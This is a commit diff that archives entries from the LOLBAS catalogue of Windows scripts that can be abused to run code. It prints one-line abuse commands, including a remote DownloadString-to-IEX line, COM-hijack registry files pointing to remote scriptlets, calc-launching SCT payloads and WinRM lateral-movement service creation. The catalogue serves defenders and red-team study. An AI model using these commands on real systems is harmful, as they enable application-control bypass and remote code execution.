Removed MD files, we only use the webportal from now on. All MD files moved to archive

Archive-Old-Version/OSScripts/CL_Invocation.ps1.md

@@ -0,0 +1,20 @@
+## CL_Invocation.ps1
+* Functions: Execute
+```
+
+. C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1   \nSyncInvoke <executable> [args]
+Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable.
+```
+   
+* Resources:   
+  * https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
+  * https://twitter.com/bohops/status/948548812561436672
+  * https://twitter.com/pabraeken/status/995107879345704961
+   
+* Full path:   
+  * C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
+  * C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1
+  * C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1
+   
+* Notes: Thanks to Jimmy - @bohops (Execute), Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate Paths)  
+   

Archive-Old-Version/OSScripts/CL_Mutexverifiers.ps1.md

@@ -0,0 +1,19 @@
+## CL_Mutexverifiers.ps1
+* Functions: Execute
+```
+
+. C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1   
+runAfterCancelProcess calc.ps1
+Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable.
+```
+   
+* Resources:   
+  * https://twitter.com/pabraeken/status/995111125447577600
+   
+* Full path:   
+  * C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
+  * C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
+  * C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
+   
+* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate)  
+   

Archive-Old-Version/OSScripts/Manage-bde.wsf.md

@@ -0,0 +1,20 @@
+## Manage-bde.wsf
+* Functions: Execute
+```
+
+set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf
+Set the comspec variable to another executable prior to calling manage-bde.wsf for execution.
+
+copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf
+Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file.
+```
+   
+* Resources:   
+  * https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712
+  * https://twitter.com/bohops/status/980659399495741441
+   
+* Full path:   
+  * C:\Windows\System32\manage-bde.wsf
+   
+* Notes: Thanks to Jimmy - @bophops (Comspec), Daniel Bohannon - @danielhbohannon (Path Hijack)  
+   

Archive-Old-Version/OSScripts/Payload/Pubprn_calc.sct

@@ -0,0 +1,22 @@
+<?XML version="1.0"?>
+<scriptlet>
+
+<registration
+    description="Bandit"
+    progid="Bandit"
+    version="1.00"
+    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
+    remotable="true"
+	>
+</registration>
+
+<script language="JScript">
+<![CDATA[
+
+	var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+	
+	
+]]>
+</script>
+
+</scriptlet>

Archive-Old-Version/OSScripts/Payload/Slmgr.reg

@@ -0,0 +1,24 @@
+Windows Registry Editor Version 5.00
+
+[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
+@=""
+
+[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary\CLSID]
+@="{00000001-0000-0000-0000-0000FEEDACDC}"
+
+
+[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
+@="Scripting.Dictionary"
+
+[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
+@="C:\\WINDOWS\\system32\\scrobj.dll"
+"ThreadingModel"="Apartment"
+
+[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
+@="Scripting.Dictionary"
+
+[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
+@="https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct"
+
+[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
+@="Scripting.Dictionary"

Archive-Old-Version/OSScripts/Payload/Slmgr_calc.sct

@@ -0,0 +1,22 @@
+<?XML version="1.0"?>
+<scriptlet>
+
+<registration
+    description="Scripting.Dictionary"
+    progid="Scripting.Dictionary"
+    version="1"
+    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
+    remotable="true"
+	>
+</registration>
+
+<script language="JScript">
+<![CDATA[
+
+		var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+	
+	
+]]>
+</script>
+
+</scriptlet>

Archive-Old-Version/OSScripts/Pubprn.vbs.md

@@ -0,0 +1,19 @@
+## Pubprn.vbs
+* Functions: Execute
+```
+
+pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct
+Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection.
+```
+   
+* Resources:   
+  * https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
+  * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
+  * https://github.com/enigma0x3/windows-operating-system-archaeology
+   
+* Full path:   
+  * C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
+  * C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
+   
+* Notes: Thanks to Matt Nelson - @enigma0x3  
+   

Archive-Old-Version/OSScripts/Slmgr.vbs.md

@@ -0,0 +1,18 @@
+## Slmgr.vbs
+* Functions: Execute
+```
+
+reg.exe import c:\path\to\Slmgr.reg & cscript.exe /b c:\windows\system32\slmgr.vbs
+Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code.
+```
+   
+* Resources:   
+  * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
+  * https://www.youtube.com/watch?v=3gz1QmiMhss
+   
+* Full path:   
+  * c:\windows\system32\slmgr.vbs
+  * c:\windows\sysWOW64\slmgr.vbs
+   
+* Notes: Thanks to Matt Nelson - @enigma0x3, Casey Smith - @subTee  
+   

Archive-Old-Version/OSScripts/SyncAppvPublishingServer.vbs.md

@@ -0,0 +1,17 @@
+## SyncAppvPublishingServer.vbs
+* Functions: Execute
+```
+
+SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
+Inject PowerShell script code with the provided arguments
+```
+   
+* Resources:   
+  * https://twitter.com/monoxgas/status/895045566090010624
+  * https://twitter.com/subTee/status/855738126882316288
+   
+* Full path:   
+  * C:\Windows\System32\SyncAppvPublishingServer.vbs
+   
+* Notes: Thanks to Nick Landers - @monoxgas, Casey Smith - @subTee  
+   

Archive-Old-Version/OSScripts/Winrm.vbs.md

@@ -0,0 +1,27 @@
+## Winrm.vbs
+* Functions: Execute
+```
+
+reg.exe import c:\path\to\Slmgr.reg & winrm quickconfig
+Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code.
+
+winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985
+Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol.
+
+winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985   \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985
+Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol.
+```
+   
+* Resources:   
+  * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
+  * https://www.youtube.com/watch?v=3gz1QmiMhss
+  * https://github.com/enigma0x3/windows-operating-system-archaeology
+  * https://redcanary.com/blog/lateral-movement-winrm-wmi/
+  * https://twitter.com/bohops/status/994405551751815170
+   
+* Full path:   
+  * C:\windows\system32\winrm.vbs
+  * C:\windows\SysWOW64\winrm.vbs
+   
+* Notes: Thanks to Matt Nelson - @enigma0x3 (Hijack), Casey Smith - @subtee (Hijack), Red Canary Company cc Tony Lambert - @redcanaryco (Win32_Process LM), Jimmy - @bohops (Win32_Service LM)  
+   

Archive-Old-Version/OSScripts/pester.bat.md

@@ -0,0 +1,18 @@
+## pester.bat
+* Functions: Execute code using Pester. The third parameter can be anything. The fourth is the payload.
+```
+
+Pester.bat [/help|?|-?|/?] "$null; notepad"
+Execute notepad
+```
+   
+* Resources:   
+  * https://twitter.com/Oddvarmoe/status/993383596244258816
+  * https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/pester.md
+   
+* Full path:   
+  * c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
+  * c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat
+   
+* Notes: Thanks to Emin Atac - @p0w3rsh3ll  
+